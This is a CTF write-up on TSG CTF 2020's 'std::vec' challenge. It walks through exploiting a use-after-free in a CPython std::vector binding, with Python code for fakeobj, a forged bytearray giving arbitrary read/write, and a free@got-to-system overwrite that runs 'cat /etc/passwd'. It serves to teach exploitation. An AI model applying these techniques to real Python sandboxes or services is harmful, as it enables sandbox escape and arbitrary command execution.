Tags: cpython pwn ctf python
In TSG CTF 2020 I got first blood on a challenge called std::vec. It was quite simple, but the overall 'feel' of the challenge was very neat. Shout out to moratorium08, the author of this challenge!
The vulnerability is easy to spot, as the same kind of bug has already appeared in other challenges. A very similar bug exists in this challenge from Facebook CTF 2019. Basically, it occurs because the private fields of a std::vector are copied to another structure. When a std::vector is expanded, the original backing memory is freed. Therefore, the pointers copied to the other location become dangling. Reading or writing through them triggers a use-after-free (UAF).
victim = stdvec.StdVec()
for i in range(0x100):
    victim.append(0)
victim_iter = iter(victim)
# free the backing memory that victim_iter still points into
for i in range(0x1000):
    victim.append(0)
obj = next(victim_iter)
In this POC, victim_iter is the variable that holds the freed pointers. In the first loop, the victim vector is expanded to accommodate 0x100 entries, which is equivalent to 0x800 bytes since each entry is a PyObject * and sizeof(PyObject *) = 8. Afterwards the iterator is extracted from the vector.
In the second loop, the vector grows to 0x1100 entries (at least 0x8800 bytes) and the original 0x800-byte backing memory is freed along the way. Therefore the pointers in victim_iter become dangling pointers. In the last line, an 8-byte read from freed memory occurs. This causes a crash.
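The sizes above can be checked with a small model of the vector's growth. This is only a sketch: it assumes the capacity doubles on every reallocation (the libstdc++ policy; other standard libraries may grow differently) and 8-byte pointers. `capacity_after` is a hypothetical helper, not part of the challenge.

```python
POINTER_SIZE = 8  # sizeof(PyObject *) on a 64-bit build


def capacity_after(pushes):
    """Capacity (in entries) after `pushes` push_back calls, assuming doubling."""
    capacity = 0
    for size in range(1, pushes + 1):
        if size > capacity:
            # reallocation: the old buffer is freed, a larger one is allocated
            capacity = max(1, capacity * 2)
    return capacity


first = capacity_after(0x100) * POINTER_SIZE            # buffer seen by iter(victim)
second = capacity_after(0x100 + 0x1000) * POINTER_SIZE  # buffer after the second loop
print(hex(first), hex(second))
```

Under this assumption the buffer that victim_iter points into is exactly 0x800 bytes, and it is released by the first append that exceeds the capacity.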
The following code causes a crash at a specific address.
victim = stdvec.StdVec()
for i in range(0x100):
    victim.append(0)
victim_iter = iter(victim)
# free the backing memory that victim_iter still points into
for i in range(0x1000):
    victim.append(0)
# reclaim the freed 0x800-byte chunk with data we control
reclaim = bytearray(0x800)
reclaim[0:8] = p64_bytearray(0xdeadbeef)
obj = next(victim_iter)
This causes a crash because the reclaim bytearray reclaims the 0x800 bytes that victim_iter still points into. The first 8 bytes of the reclaimed memory become 0xdeadbeef, so next(victim_iter) returns (PyObject *)0xdeadbeef. However, returning a PyObject increments its refcount by 1, and this write access causes the crash.
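The snippets in this writeup call a helper named p64_bytearray whose definition is not shown. A minimal sketch, assuming it packs an unsigned 64-bit integer into 8 little-endian bytes and returns them as a bytearray; the author's actual helper may differ, for example if struct cannot be imported in the challenge environment.

```python
import struct


def p64_bytearray(value):
    """Pack an unsigned 64-bit integer as 8 little-endian bytes (assumed behaviour)."""
    return bytearray(struct.pack("<Q", value))


packed = p64_bytearray(0xdeadbeef)
print(packed.hex())  # efbeadde00000000
```

Assigning the result to an 8-byte slice such as reclaim[0:8] keeps the length of the bytearray unchanged, so the reclaimed chunk is not reallocated.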
Now we can construct the fakeobj primitive based on this POC.
def fakeobj(address):
    victim = stdvec.StdVec()
    for i in range(0x100):
        victim.append(0)
    victim_iter = iter(victim)
    # free the backing memory that victim_iter still points into
    for i in range(0x1000):
        victim.append(0)
    # reclaim the freed chunk and plant the fake object pointer in slot 0
    reclaim = bytearray(0x800)
    reclaim[0:8] = p64_bytearray(address)
    obj = next(victim_iter)
    return obj
Basically, the fakeobj function converts an address into a Python object. If the contents at that address are well controlled, we can forge an arbitrary Python object, which is an extremely powerful primitive.
A way to put controlled data at a known address is to use Python bytes. In bytes, the content is inlined in the structure at offset 0x20. This can be seen in the following definition. (Although I figured this out intuitively by looking at gdb during the CTF.)
typedef struct {
    PyObject_VAR_HEAD
    Py_hash_t ob_shash;
    char ob_sval[1];
    /* Invariants:
     *     ob_sval contains space for 'ob_size+1' elements.
     *     ob_sval[ob_size] == 0.
     *     ob_shash is the hash of the string or -1 if not computed yet.
     */
} PyBytesObject;
Therefore, by providing id(bytes_object) + 0x20 to fakeobj we can forge an arbitrary Python object (in CPython, id() returns the address of the object).
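The offset can be checked locally without gdb. The sketch below assumes CPython, where id() is the object's address and tp_basicsize of bytes equals the offset of ob_sval plus one byte for the trailing NUL. It uses ctypes, which is only for local experimentation and is not available in the challenge sandbox. `bytes_payload_address` is a hypothetical helper name.

```python
import ctypes

# Offset of ob_sval inside PyBytesObject; tp_basicsize also counts the trailing NUL.
PAYLOAD_OFFSET = bytes.__basicsize__ - 1


def bytes_payload_address(obj):
    """Address of the first content byte of a bytes object (CPython only)."""
    return id(obj) + PAYLOAD_OFFSET


data = b"A" * 8 + b"B" * 8
# Read the bytes back straight from memory to confirm the offset.
readback = ctypes.string_at(bytes_payload_address(data), len(data))
print(hex(PAYLOAD_OFFSET), readback == data)
```

On a standard 64-bit CPython build the printed offset should be 0x20, matching the value used in this writeup.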
To get arbitrary write, we forge a bytearray object with a user-controlled backing buffer pointer. The structure of a bytearray is the following.
struct PyByteArrayObject {
    int64_t ob_refcnt;          /* can be basically any value we want */
    struct _typeobject *ob_type; /* points to the bytearray type object */
    int64_t ob_size;            /* Number of items in variable part */
    int64_t ob_alloc;           /* How many bytes allocated in ob_bytes */
    char *ob_bytes;             /* Physical backing buffer */
    char *ob_start;             /* Logical start inside ob_bytes */
    int32_t ob_exports;         /* Not exactly sure what this does, we can ignore it */
};
By controlling ob_bytes and ob_start we can read/write at arbitrary addresses. The following code implements the forging of a bytearray.
# fields: ob_refcnt, ob_type, ob_size, ob_alloc, ob_bytes, ob_start
string = p64(0xff) + p64(id(type(bytearray(0)))) + p64(0x100) + p64(0x100) + p64(someaddr) * 2
faked = fakeobj(id(string) + 0x20)
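To make the field order explicit, the same header can be built with struct.pack. This is a sketch that follows the PyByteArrayObject layout given in this writeup (other CPython versions may lay the object out differently). `fake_bytearray_header` is a hypothetical helper and 0x41414141 is a placeholder target address. Nothing is dereferenced here; the code only produces the 0x30 bytes that would be placed inside a bytes object.

```python
import struct


def fake_bytearray_header(type_addr, target, size=0x100):
    """Pack the first six 8-byte fields of the PyByteArrayObject layout."""
    return struct.pack(
        "<6Q",
        0xFF,       # ob_refcnt: arbitrary value, 0xff as in the writeup
        type_addr,  # ob_type: address of the bytearray type object
        size,       # ob_size
        size,       # ob_alloc
        target,     # ob_bytes
        target,     # ob_start
    )


header = fake_bytearray_header(id(bytearray), 0x41414141)
print(len(header), header[0x20:0x28].hex())
```

ob_exports is left out, as in the original one-liner, so whatever follows the header in memory ends up in that field.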
Also, since we want to perform arbitrary reads/writes multiple times, we use the following strategy. We first create a slave bytearray. Then, we forge a master bytearray using fakeobj. The master bytearray's ob_bytes points to the address of slave, so writing to master alters the structure of slave. Therefore we can set the write address by writing at offsets 0x20 (ob_bytes) and 0x28 (ob_start) of master, and then writing to slave. The following code implements this.
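def arbitrary_write(address, value):
    # retarget slave: overwrite its ob_bytes and ob_start through master
    master[0x20:0x28] = p64_bytearray(address)
    master[0x28:0x30] = p64_bytearray(address)
    # slave now writes directly to `address`
    slave[0:0x8] = p64_bytearray(value)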
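The two-step pattern can be illustrated with a toy model that touches no real memory. In this sketch a flat bytearray stands in for the address space, the slave's header sits at a fixed offset inside it, and the two steps of the write are simulated by hand. All names and addresses are illustrative assumptions, not the exploit itself.

```python
import struct

memory = bytearray(0x100)        # toy flat address space
SLAVE_HEADER = 0x00              # where the slave's header lives in the toy memory
OB_BYTES, OB_START = 0x20, 0x28  # field offsets inside the header


def arbitrary_write(address, value):
    # "master" write: retarget the slave's ob_bytes and ob_start fields
    struct.pack_into("<Q", memory, SLAVE_HEADER + OB_BYTES, address)
    struct.pack_into("<Q", memory, SLAVE_HEADER + OB_START, address)
    # "slave" write: store through the pointer that was just installed
    (start,) = struct.unpack_from("<Q", memory, SLAVE_HEADER + OB_START)
    struct.pack_into("<Q", memory, start, value)


arbitrary_write(0x80, 0x1122334455667788)
arbitrary_write(0xC0, 0xDEADBEEF)
print(memory[0x80:0x88].hex(), memory[0xC0:0xC8].hex())
```

The point of the indirection is that the master only has to be forged once; every later write just updates two pointer fields and reuses the slave.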
Now we can write an exploit by gluing together all of the primitives above. However, there are a few issues to resolve.
First, we can't use the functions iter and next because all builtins are removed. Therefore, we replace the code with the following code.
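# replaces the iter()/next() calls inside fakeobj(address)
counter = 0
for x in victim:
    # this frees the backing memory of the current iterator
    for j in range(0x1000):
        victim.append(0)
    reclaim = bytearray(0x800)
    # slot 1 is the entry the for loop reads on its second iteration
    reclaim[0x8:0x10] = p64_bytearray(address)
    if counter == 1:
        return x
    counter += 1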
Basically, it is an implementation that doesn't use iter and next and instead relies on the internals of for loops.
Second, we can't use the type function for the same reason as in the first issue. However, since the python binary is not built as PIE and the type object is located in the data section of the binary, the type object is always located at the same address. Therefore we can print the id of type(bytearray(0)) locally and use it for the exploit. I found it was 10595392 (0xa1ac40).
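Looking up the address locally is a one-liner. The sketch below assumes CPython, where id() returns the object's address. The printed value only matches the remote target when the same non-PIE python binary is used, so on another build the first line of output will differ from the constant quoted above.

```python
# In CPython, id() is the object's address, and type(bytearray(0)) is bytearray itself.
bytearray_type_addr = id(type(bytearray(0)))
print(hex(bytearray_type_addr))

# The constant reported in this writeup, shown in hex for comparison.
REPORTED_ADDR = 10595392
print(hex(REPORTED_ADDR))  # 0xa1ac40
```

Hardcoding the constant in the exploit removes the need for the type builtin in the sandbox.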
Lastly, we need to find a function pointer to overwrite. I used free@got for this. To free something whose contents we can control, I hand-fuzzed various methods and figured out that printing a string frees it. So, print("cat /etc/passwd") triggers system("cat /etc/passwd") if we overwrite free@got with system.
This is my final exploit. I hope it is a good reference for others.